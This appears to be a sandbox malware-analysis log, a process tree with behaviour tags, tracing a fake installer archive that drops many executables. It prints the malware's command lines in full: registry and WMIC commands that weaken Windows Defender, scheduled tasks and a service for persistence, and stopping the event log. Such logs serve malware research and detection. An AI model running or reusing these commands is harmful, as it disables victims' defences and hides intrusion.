PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 4384	4744	firefox.exe	81
PID 4744 wrote to memory of 2860	4744	firefox.exe	82

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\AppGate_3.rar
1⤵
- Modifies registry class
PID:3652

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1768
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\AppGate_3.rar"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3664
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\AppData\Local\Temp\AppGate_3.rar
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - NTFS ADS
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4744
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.0.1336305927\531833653" -parentBuildID 20221007134813 -prefsHandle 1728 -prefMapHandle 1720 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d77764f5-348d-4a93-81b5-8ce202cecee8} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 1808 1d41b2be758 gpu
      4⤵
      PID:828
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.1.795100003\1184652286" -parentBuildID 20221007134813 -prefsHandle 2172 -prefMapHandle 2168 -prefsLen 21608 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b8d5c26-c8f0-4db6-bc74-c6549aef29bb} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 2184 1d41b1fb058 socket
      4⤵
      Checks processor information in registry
      PID:4384
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.2.1966030927\607220883" -childID 1 -isForBrowser -prefsHandle 2988 -prefMapHandle 2984 -prefsLen 21711 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dbf99a7-33b7-4403-8ef3-576c457f6ffb} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 2800 1d41b261b58 tab
      4⤵
      PID:2860
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.3.135230906\566766337" -childID 2 -isForBrowser -prefsHandle 3468 -prefMapHandle 3020 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8762a1f5-6f79-4157-a246-df9786f87864} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 2800 1d408f68858 tab
      4⤵
      PID:4276
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.4.2089941265\662267467" -childID 3 -isForBrowser -prefsHandle 4780 -prefMapHandle 4792 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6296ca16-12a3-4826-8b86-af9f61b3fafd} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 4452 1d41ca45658 tab
      4⤵
      PID:316
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.5.1098159229\942351713" -childID 4 -isForBrowser -prefsHandle 4880 -prefMapHandle 4884 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fcace6f-5f1d-4998-98b7-ae3cfce52b64} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 4872 1d41ca45f58 tab
      4⤵
      PID:4756
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.6.151771103\1159971769" -childID 5 -isForBrowser -prefsHandle 5104 -prefMapHandle 5108 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c70ff43-cee7-4e3e-87b4-e78c8fdf9885} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 5092 1d41ca46558 tab
      4⤵
      PID:3664
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.7.953017116\2115616721" -childID 6 -isForBrowser -prefsHandle 3104 -prefMapHandle 5628 -prefsLen 26543 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e47d019d-f622-49a6-82ae-7810b2d62c26} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 2588 1d41c430058 tab
      4⤵
      PID:4192
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.8.1899115369\427685265" -childID 7 -isForBrowser -prefsHandle 6004 -prefMapHandle 6000 -prefsLen 26543 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {367deeb0-9b40-45c2-975c-acc0284ec6fe} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 6012 1d4231f2c58 tab
      4⤵
      PID:168
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.9.548632171\2110983326" -childID 8 -isForBrowser -prefsHandle 4452 -prefMapHandle 4848 -prefsLen 26808 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {514c9e96-353a-4a71-9b6c-caf0f3ad2143} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 5116 1d41ca3a458 tab
      4⤵
      PID:3700
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4744.10.283243853\885991145" -childID 9 -isForBrowser -prefsHandle 4220 -prefMapHandle 4952 -prefsLen 26864 -prefMapSize 233444 -jsInitHandle 1272 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a08846a-f8cc-4feb-84f9-1f6a6b3065ec} 4744 "\\.\pipe\gecko-crash-server-pipe.4744" 4216 1d41dbb4558 tab
      4⤵
      PID:4956
  - - C:\Users\Admin\Downloads\7z2406-x64.exe
      "C:\Users\Admin\Downloads\7z2406-x64.exe"
      4⤵
      Executes dropped EXE
      Registers COM server for autorun
      Drops file in Program Files directory
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2708

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4424

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\AppGate_3.rar"
1⤵
PID:1524
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Downloads\AppGate_3.rar
  2⤵
  - Checks processor information in registry
  PID:2996

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\AppGate_3\" -spe -an -ai#7zMap22684:80:7zEvent29450
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4876

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4752

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\AppGate_3\" -spe -an -ai#7zMap7000:80:7zEvent12478
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2552

C:\Users\Admin\Downloads\AppGate_3\setup.exe
"C:\Users\Admin\Downloads\AppGate_3\setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:4516
- C:\Users\Admin\Documents\SimpleAdobe\YkFbnF18WKlD_PdMU7QNB4GR.exe
  C:\Users\Admin\Documents\SimpleAdobe\YkFbnF18WKlD_PdMU7QNB4GR.exe
  2⤵
  - Executes dropped EXE
  PID:2076
- C:\Users\Admin\Documents\SimpleAdobe\PfM9di0SFCgdQu5zud76avXo.exe
  C:\Users\Admin\Documents\SimpleAdobe\PfM9di0SFCgdQu5zud76avXo.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:2648
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1124
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:3436
- C:\Users\Admin\Documents\SimpleAdobe\3bqsaxgdhYyZV67bGKzFoGv2.exe
  C:\Users\Admin\Documents\SimpleAdobe\3bqsaxgdhYyZV67bGKzFoGv2.exe
  2⤵
  - Executes dropped EXE
  PID:756
- - C:\ProgramData\DGIJECGDGC.exe
    "C:\ProgramData\DGIJECGDGC.exe"
    3⤵
    PID:4120
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4296
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KKJKEBKFCAAE" & exit
    3⤵
    PID:3676
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 10
      4⤵
      Delays execution with timeout.exe
      PID:4944
- C:\Users\Admin\Documents\SimpleAdobe\SbOexcXltb2Agn2ru3rsEcbz.exe
  C:\Users\Admin\Documents\SimpleAdobe\SbOexcXltb2Agn2ru3rsEcbz.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1588
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Checks processor information in registry
    PID:4512
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ECAEGHIJEHJD" & exit
      4⤵
      PID:4264
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:4296
- C:\Users\Admin\Documents\SimpleAdobe\5dWOqDmgKaXGKYn8YSJ4kqBc.exe
  C:\Users\Admin\Documents\SimpleAdobe\5dWOqDmgKaXGKYn8YSJ4kqBc.exe
  2⤵
  - Executes dropped EXE
  PID:2288
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 764
    3⤵
    - Program crash
    PID:68
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 820
    3⤵
    - Program crash
    PID:2640
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 844
    3⤵
    - Program crash
    PID:4384
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 864
    3⤵
    - Program crash
    PID:3652
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 972
    3⤵
    - Program crash
    PID:1080
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 1116
    3⤵
    - Program crash
    PID:2184
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 1152
    3⤵
    - Program crash
    PID:2124
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 1120
    3⤵
    - Program crash
    PID:4540
- C:\Users\Admin\Documents\SimpleAdobe\_WP7kdOqbqZzzYP3lTi1fdVu.exe
  C:\Users\Admin\Documents\SimpleAdobe\_WP7kdOqbqZzzYP3lTi1fdVu.exe
  2⤵
  - Executes dropped EXE
  PID:3336
- - C:\Users\Admin\AppData\Local\Temp\is-6CP38.tmp\_WP7kdOqbqZzzYP3lTi1fdVu.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-6CP38.tmp\_WP7kdOqbqZzzYP3lTi1fdVu.tmp" /SL5="$70288,4608415,54272,C:\Users\Admin\Documents\SimpleAdobe\_WP7kdOqbqZzzYP3lTi1fdVu.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4108
  - - C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio.exe
      "C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio.exe" -i
      4⤵
      Executes dropped EXE
      PID:4212
  - - C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio.exe
      "C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio.exe" -s
      4⤵
      Executes dropped EXE
      PID:1084
- C:\Users\Admin\Documents\SimpleAdobe\EujliRSqoNGxQSvgcZwYHM0a.exe
  C:\Users\Admin\Documents\SimpleAdobe\EujliRSqoNGxQSvgcZwYHM0a.exe
  2⤵
  - Executes dropped EXE
  PID:3324
- - C:\Users\Admin\AppData\Local\Temp\7zSBC28.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    PID:2528
  - - C:\Users\Admin\AppData\Local\Temp\7zSDA20.tmp\Install.exe
      .\Install.exe /QdidAa "525403" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      PID:3544
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:4720
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:4672
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:2172
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:1888
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:4372
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:4908
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:4600
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:1872
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:2828
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:1680
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:3700
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2944
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:2996
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:2016
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:1760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4360
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:1068
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bcicWGWSPuqTxjDSpV" /SC once /ST 10:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSDA20.tmp\Install.exe\" Yw /GHldidqndK 525403 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:2996
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bcicWGWSPuqTxjDSpV"
        5⤵
        
        PID:2320
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bcicWGWSPuqTxjDSpV
        6⤵
        
        PID:352
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bcicWGWSPuqTxjDSpV
        7⤵
        
        PID:196
- C:\Users\Admin\Documents\SimpleAdobe\QsBxbMAfJNBQCdg_pg0H1RrR.exe
  C:\Users\Admin\Documents\SimpleAdobe\QsBxbMAfJNBQCdg_pg0H1RrR.exe
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4596
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:2968
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:1584
- C:\Users\Admin\Documents\SimpleAdobe\UveIvkZy0meSnpmxZkeJYnaa.exe
  C:\Users\Admin\Documents\SimpleAdobe\UveIvkZy0meSnpmxZkeJYnaa.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1512
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:1504
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5060
- C:\Users\Admin\Documents\SimpleAdobe\1v7DQzzvtFrGqTe3EOWskSNB.exe
  C:\Users\Admin\Documents\SimpleAdobe\1v7DQzzvtFrGqTe3EOWskSNB.exe
  2⤵
  - Executes dropped EXE
  PID:4876
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:3896
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:1376
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:4256
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:4588
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "RULTVSKP"
    3⤵
    - Launches sc.exe
    PID:1380
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4880
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:3148
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "RULTVSKP"
    3⤵
    - Launches sc.exe
    PID:1372
- C:\Users\Admin\Documents\SimpleAdobe\03CZokS0HonJoqM4c6Xg0U7K.exe
  C:\Users\Admin\Documents\SimpleAdobe\03CZokS0HonJoqM4c6Xg0U7K.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:4276
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4724
- C:\Users\Admin\Documents\SimpleAdobe\f6McHUkv64D7xAPSGsYLgwj6.exe
  C:\Users\Admin\Documents\SimpleAdobe\f6McHUkv64D7xAPSGsYLgwj6.exe
  2⤵
  - Executes dropped EXE
  PID:1380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
    3⤵
    PID:2684
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\world.exe
      world.exe -priverdD
      4⤵
      Executes dropped EXE
      PID:1820
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\moigsaw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\moigsaw.exe"
        5⤵
        Executes dropped EXE
        
        PID:4624
- C:\Users\Admin\Documents\SimpleAdobe\A83BCcdrPH0IdZ2cpT2yeQ_I.exe
  C:\Users\Admin\Documents\SimpleAdobe\A83BCcdrPH0IdZ2cpT2yeQ_I.exe
  2⤵
  - Executes dropped EXE
  PID:3344

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5100

C:\Users\Admin\AppData\Local\Temp\7zSDA20.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSDA20.tmp\Install.exe Yw /GHldidqndK 525403 /S
1⤵
PID:2508
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:4660
- - C:\Windows\SysWOW64\forfiles.exe
